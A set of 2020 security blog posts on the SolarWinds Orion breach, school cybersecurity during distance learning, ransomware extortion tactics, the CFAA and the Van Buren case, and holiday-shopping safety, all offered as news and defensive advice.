Categories
Security

The cyberattack that could only happen in 2020

I’m sure you already heard the news. Last week, we learned that (likely) Russian nation-state hackers conducted a massive APT attack that impacted thousands of companies and government agencies through tainted updates of the SolarWinds Orion platform. This sophisticated supply-chain attack ensnared over 200 public and private organizations dating back to March.

We are relativity early in the process of deconstructing this stealthy attack — more details will emerge over time, including what the Russian APT group was really after, though we do know they monitored communications of hacked organizations for months. The US Cybersecurity and Infrastructure Security Agency (CISA) called the attack a “grave risk” to national security, while others described it as devastating to the economy, infrastructure, and public trust on a level not seen since ShadowBrokers.

Attacks like these are scary as hell, but they’re not going away. That’s why it’s important to share what we know, so there doesn’t have to be a “next time.”

Massive Russian hack leaves private and public sector reeling

If you were in a minor state of shock after learning about the presumed Russian hack, you weren’t alone. As if our supply chain, infrastructure, and business security weren’t already taxed enough by the pandemic, IT teams running SolarWinds software must now contend with complex mitigation efforts to root out backdoors slipped into Orion platform updates earlier this year. The boobytrapped updates pushed the Sunburst malware onto victim networks, which then gathered recon for 12 to 14 days before sending data to a remote C&C server. If the intelligence proved fruitful, Russian threat actors then escalated their attacks on select networks.

It’s important to note that of the 18,000+ organizations that received malicious updates through Orion, only 200 were targeted for follow-on action. Therefore, many businesses may be sitting on a “dormant” version of the Sunburst malware and not yet know it. CISA advises: “Organizations with suspected compromises need to be highly conscious of operational security, including when engaging in incident response activities and planning and implementing remediation plans.” However, there are a few proactive steps you can take:

  • Immediately isolate any systems running the Orion platform versions 2019.4 HF 5 through 2020.2.1, released between March and June 2020
  • Scan your premises using an endpoint protection product like Malwarebytes and look for detections, such as Backdoor.Sunburst and Backdoor.WebShell
  • Use the Indicators of Compromise at the end of this Malwarebytes Labs blog to hunt within your logs, telemetry, and other SIEM data to learn the perspective timeline of intrusion
  • Perform a comprehensive security sweep to review and harden your physical and cloud infrastructure
  • Upgrade to Orion platform version 2020.2.1 HF 2 and restore systems once you feel confident with the previous steps

For more technical information on the cyberattack from CISA: https://us-cert.cisa.gov/ncas/alerts/aa20-352a

Categories
Security

Most US schools fail to secure distance learners

Education in the United States faced a crisis this year. The looming threat of the coronavirus — which spreads easily in enclosed classrooms — forced schools across the country to develop new strategies for education, most involving some form of distance learning.

The dramatic stress of this transition on teachers, parents, and students is well-known. But the impact of long-term distance learning on the cybersecurity posture of schools and districts has not yet been studied — until now. Researchers at Malwarebytes surveyed IT decision-makers and students from K–12 and trade schools, as well as colleges, throughout the US to compile a report on how education security has fared in the wake of the pandemic.

The results paint a rather grim portrait; the education sector, having always struggled with lack of IT budget and personnel, was ill-equipped to move millions of students to a distance learning model. And despite Herculean efforts by IT teams to connect every student and teacher, cybersecurity often slipped through the cracks.

US distance learners remain vulnerable to cyberattack

US schools have been under tremendous pressure over the last 10 months. Forced to close their doors with little warning, teachers, administrators, and IT teams spent the first few months of the pandemic simply figuring out logistics, such as how to get students access to school resources, devices, and Internet service. Unlike most workplaces, schools have been slower to adopt new technologies, and they were not set up for an easy transition to a distance learning model.

Yet even now, halfway through the schoolyear, educational institutions are struggling with cybersecurity for distance learners. Nearly half of all schools did not change their cybersecurity protocols in response to the new distance learning model, which resulted in a number of issues that dramatically increased IT workload and put undue strain on teachers. Some schools even suffered cyberattacks that delayed their distance learning lesson plans for up to a week. Other key takeaways from the report include:

  • 51 percent of IT decision-makers said that no students, teachers, staff, or guests (including parents) were required to enroll in cybersecurity training before the new school year began
  • 47 percent said their schools developed no additional requirements — no distance learning read-throughs, no antivirus tool installations — for the students, faculty, or staff who connected to the school’s network
  • 46 percent of students said their schools suffered a cyberattack (though only 3 percent of IT professionals admitted to the same); On the flip side, of those who engaged in security best practices before the transition to distance learning, none experienced a breach or had to cancel a single day of learning due to a cyberattack

Clearly, security awareness makes a difference in the overall safety of an organization. In fact, of those who were well-studied in cybersecurity, fewer suffered sustained, excess IT workload or experienced Zoombombing attacks than those who were less prepared. However, knowledge is only half the battle. Many respondents were saddled with device and data shortages. Other schools fell flat on security budget. Additional IT challenges presented by distance learning include the following:

  • 40 percent of educational IT pros said their schools are still missing laptops, computers, or tablets for students
  • 28 percent are still missing these devices for teachers
  • 20 percent of IT decision-makers said they had trouble convincing their schools to invest in cybersecurity
  • 44 percent admitted to difficulties in managing the sudden increase of devices connected to the school network
  • 80 percent said there was a steep learning curve for teachers, students, and staff to adapt to online learning tools

But the report wasn’t all doom and gloom. IT professionals had a gargantuan task in front of them to keep teachers teaching and students learning, and for the most part, they were up to the task. About 72 percent of schools provided Chromebooks, tablets, and hotspots to students, and 59 percent distributed laptops, external microphones, and webcams to teachers. More than 70 percent deployed new software tools for distance learning, including Google Classroom and Zoom.

Unfortunately, despite super-human efforts by some educational IT teams, lack of resources, personnel, and budget have strained an already impacted security posture to nearly the breaking point. About 76 percent of respondents experienced connectivity issues, 30 percent suffered a Zoombombing attack, and 52 percent of teachers had to step in and solve an IT or security issue for students and parents. On the bright side, actual cyberattacks were relatively rare.

So, what can educational IT teams do to improve their school’s security posture in 2021 and beyond? Here’s what the report suggests:

  • Create and train teachers and staff on new cybersecurity policies relevant to distance learning (For other businesses, this can be an additional set of rules related to remote work/work from home)
  • Develop requirements that direct teachers and parents to the appropriate point person in IT or security, should issues arise that need solving quickly
  • Implement access rules, including whether students should use a VPN or password manager to access the school’s network and accounts
  • Host cybersecurity training events for teachers, staff, students, and parents

For more information on the state of education security in the US, read the full report from Malwarebytes Labs here: https://resources.malwarebytes.com/files/2020/12/Lessons-in-cybersecurity_How-education-coped-in-the-shift-to-distance-learning_Malwarebytes.pdf

Categories
Security

Paying the ransom. Damned if you do, damned if you don’t

There isn’t a person on Earth who would argue that 2020 has been a good year for fighting viruses. Turns out, it’s also been a tough one for ransomware.

While ransomware attacks have been arguably ramping up since 2016, it was 2020 that rained expensive ransom threats down on companies from a wide range of increasingly dangerous and emboldened cybercriminal gangs. Ryuk, Sodinokibi, Maze, and others doubled down on their dastardly deeds by not only encrypting and withholding sensitive data, but threatening to make it public.

In a stunning end-of-the-year development, ransomware actors showed belligerent persistence by cold calling organizations that refrained from paying the ransom or targeting them with an angry Facebook ad campaign. Meanwhile, cybercriminals have increasingly been hanging onto the files of those that do pay the ransom for auction or re-exploitation. It seems like businesses are either damned if they pay the ransom, or damned if they don’t. So what’s the right move?

Ransomware authors push the envelope, emboldened by success

Ransomware authors are having a field day — or rather, a field year. In 2019, the average ransom payment was $41,000. A year later, it was $234,000, about a 470 percent increase. Ransom demands have skyrocketed in 2020, as have their frequency and potency. Even if organizations are following security best practices by ignoring ransom notes and restoring from backups, they can no longer claim victory. In fact, businesses can run into trouble whether they refuse to pay the ransom or pay in full.

Victims of ransomware attacks who don’t compensate their captors are now rewarded with a not-so-friendly phone call from cybercriminals, marking an escalation in tactics that include threatening to notify journalists of the breach or leaking data onto public sites. Ransomware gangs such as Maze, Ryuk, Conti, and Egregor/Sekhmet have been engaging in these cold calls as far back as August, often dialing from a call center and using a script. The callers make vague threats about continuing to monitor victim endpoints and issue an ultimatum: Pay up now or the problems with your network “will never end.”

To add insult to injury, the threat actors behind Ragnar Locker ransomware have cooked up a similar scheme, this time pressuring victims into paying via fraudulent Facebook ads. According to Brian Krebs, one such ad was taken out against Italian beverage company Campari Group, which had already publicly acknowledged a malware attack. Cybercriminals used hacked accounts to pay for the ads, which Facebook did eventually detect as a scam, but not before displaying them to thousands of people.

On the flip side, ransomware gangs are increasingly failing to make good on their promise of deleting stolen data once the ransom has been paid. Back in 2019, Maze introduced the idea of double extortion — ransoming data plus threatening to release it publicly — and other ransomware operators followed suit, dumping sensitive files onto data leak sites. Over the summer, Sodinokibi took this a step further. When threatening victims to pay up didn’t work, they began auctioning off their stolen data online, charging hefty prices to the highest bidder (often a competitor).

These tactics reveal an uncomfortable truth: There’s no way to tell whether a cybercriminal group has actually deleted the files they promise to delete after you pay the ransom. According to Coveware’s Q3 2020 report on ransomware, groups such as Sodinokibi, Conti, Maze, Sekhmet/Egregor, Mespinoza, and Netwalker are using fake data as proof of deletion or even re-extorting the same victim.

So, what’s an IT/security professional to do? The FBI has flip-flopped on its official position about whether organizations should pay the ransom, first staying mum on the topic, then stating unequivocally that the ransom should never be paid. For a while, many in the security industry were inclined to agree. But that’s a tough pill to swallow for individuals. Would you pay a $200 ransom to return your PhD thesis, which represents months of work? What about for pictures of your baby’s first year?

As ransomware actors become more and more aggressive — not just stealing data and threatening to release it, but interrupting operations in hospitals, schools, and cities — some in the security industry have changed their tune. There are many who believe that in rare cases, organizations should try to negotiate for their most important files back. An entire industry of ransomware insurance providers has popped up to provide companies with cover, should their files be ransomed for exorbitant amounts.

The long and short of it is there’s no one-size-fits-all answer when it comes to ransomware. Once again, the best defense against this threat is to avoid infection in the first place. If your security software doesn’t protect against the ransomware authors mentioned above, you may want to consider investing in additional protection.

Categories
Security

Are we all hackers?

In 1986, personal computer technology was still in its relative infancy. Yet in that same year, the first PC virus appeared in the wild. In response to the growing threat of hackers, lawmakers passed the Computer Fraud and Abuse Act (CFAA), establishing any act of unauthorized access (or one that exceeds authorized access) to a computer as illegal.

Over the years, security researchers, pen testers, and others in the IT field have expressed concern about the vagueness of the law. Without defining what “without authorization” means, those in cybersecurity have questioned the ability of US courts to accurately interpret its meaning — without unduly punishing security professionals for doing their jobs.

So when the Supreme Court heard arguments in the computer crimes case Van Buren vs. the United States on Monday, November 30, the IT and security communities took notice. Their ruling in this case could significantly broaden or narrow the scope of the law.

With the Department of Justice bringing charges against one of their own for using a database he already had access to (but for a different purpose), several justices expressed alarm that a ruling in their favor “risked making a federal criminal of us all.”

The 1986 Computer Fraud and Abuse Act (CFAA) states that whoever has “knowingly accessed a computer without authorization or exceeding authorized access” is subject to a fine and imprisonment relative to the type of information obtained or damage caused to the personal computer. Seems pretty straight-forward on the surface. But as you dig deeper into the law’s provisions, the broad range of prohibited actions and protected data described can spin the head of the most seasoned security professional. For example, here are some of the types of data that are illegal to obtain according to the law:

  • Data that requires protection from disclosure for national security purposes
  • Information contained in a financial record of a financial institution
  • Information from any department or agency of the United States
  • Information from any protected computer

Besides the aforementioned “unauthorized access” statute, the CFAA also bans the following actions:

  • Knowingly causing the transmission of a program, information, code, or command, and as a result, causing damage to a protected computer
  • Knowingly and with intent to defraud traffic using a password or similar information to access a computer, which affects commerce or is used by or for the US government
  • With intent to extort, transmitting any communication containing any threat to cause damage to a protected computer

Amendments to the law over the years have resulted in this hodge-podge of changing provisions, and the punishments for violating any one of them range from a slap-on-the-wrist fine to up to 20 years in prison. For a pen tester who needs to knowingly access unauthorized systems as part of her job, the danger of a judge misinterpreting any one of these provisions likely keeps her up at night.

The ruling in the Van Buren case, then, could set the stage for either clarifying an obscure law or for making a mess for bug testers, ethical hackers, or even folks sharing their Netflix password. (Under the current interpretation of the law, sharing a password to an account is technically illegal, though no prosecutor has ever charged someone for this “crime.”)

Looking closely at the spirit of the law, its original intent was to prevent cybercriminals from hacking into personal or business computers and stealing data or causing damage. However, without a firm definition of the meaning of “authorized access,” including addendums for potential exceptions to the rule, the Supreme Court could possibly make hackers of us all. After all, anytime you access a website, a server, the cloud, a streaming service — you are accessing someone else’s computer.

Let’s hope the Supreme Court gives this law the 21st century update it requires by adding sharper focus that serves a punishment fit for the crime, while letting the good guys keep fighting the good fight.

For more information on the CFAA, here’s an article from the National Association of Criminal Defense Lawyers: https://www.nacdl.org/Landing/ComputerFraudandAbuseAct

And for a closer legal analysis of the Supreme Court case: https://www.politico.com/news/2020/11/30/supreme-court-computer-crime-law-441441

Categories
Security

Cybercriminal Monday: remote employees and retailers take caution

For the last 10+ years, the post-Thanksgiving shopping bonanza known as Black Friday has courted crowds and controversy, with major retailers deciding to open their doors on Thanksgiving Day to mobs of rabid customers looking for deep discounts.

This year, things look a little different. While some doors will open on Black Friday, many shoppers will choose to look for deals online instead. And even though online shopping will protect consumers from catching COVID-19, there’s no guarantee they won’t pick up a different kind of virus — and pass it on to corporate networks.

Conversely, online retailers and organizations with ecommerce platforms should take extra precautions this year, as cybercriminals have already ramped up their attacks on a wide variety of shopping sites.

Watch out for Black Friday and Cyber Monday pitfalls

As the nation heads into a holiday season on lockdown, we once again face norms-defying circumstances: Thanksgiving gatherings will be much smaller and Black Friday will likely have crowds rushing to their laptops instead of their local malls.

Since the start of the pandemic, online spending has increased by 75 percent. Ecommerce cybercrime has followed suit, with a 25 percent rise in credit card skimming observed in the first month of the pandemic alone. Scams laced with COVID-19 misinformation have tricked thousands into giving out their personal and business data or led to infections of home and corporate networks. And ransomware attacks have taken advantage of a vulnerable and distributed workforce. All this means the stakes are even higher for the coming week of holiday shopping.

In fact, expect stores to extend Black Friday deals through the month and beyond, luring shoppers repeatedly back to their ecommerce pages for maximum return on investment. But the old methods for staying safe while online shopping are not all relevant in today’s threat landscape. For organizations with remote employees who may also use their work device for personal use (or personal device for work activities), it’s prudent to send out reminders this holiday shopping season to keep personal business — especially online purchases — separate from business business. Here are a few you can send to your staff:

  • Just because a website uses HTTPS and has a padlock does not mean it is safe. It simply means that the connection is secure between a particular server and who the website claims to be. But it’s easy for cybercriminals to spoof legitimate sites and have your information be sent to them over a secure connection. All the padlock guarantees is that other cybercriminals can’t interrupt the exchange.
  • To protect against web skimmers, consider equipping personal devices with antivirus software that has web protection, or browser extensions that block malicious content. All work devices should be protected with the same.
  • Avoid clicking directly on targeted ads for a particular deal. Online ads could contain exploits delivered via malvertising, which could deliver malicious payloads or divert users to scam pages. If there’s an ad for a great deal, go directly to the retailer’s website instead.
  • Do not use public WiFi to shop online. Also avoid using the company’s VPN for that purpose. The best bet is to shop from a password-secured home network or to purchase your own VPN for home use.

In addition, online retailers and other ecommerce sites should take particular precautions over the next month to protect against web skimmers or other online attacks. Here’s my advice for staying secure:

  • Keep your site updated to protect against cybercriminals who would exploit vulnerabilities, and that includes shoring up weak code. Make sure any admin access to the site’s backend is protected with a strong, rotating password.
  • Make sure any third parties, including Content Management Systems (CMSes), financial transaction partners, or even libraries of code are free from known vulnerabilities by running all updates or cross-checking code for mistakes.
  • Take preventative measures by implementing safeguards, such as a Content Security Policy (CSR) and Subresource Integrity (SRI).

Best wishes for a safe and happy Thanksgiving holiday!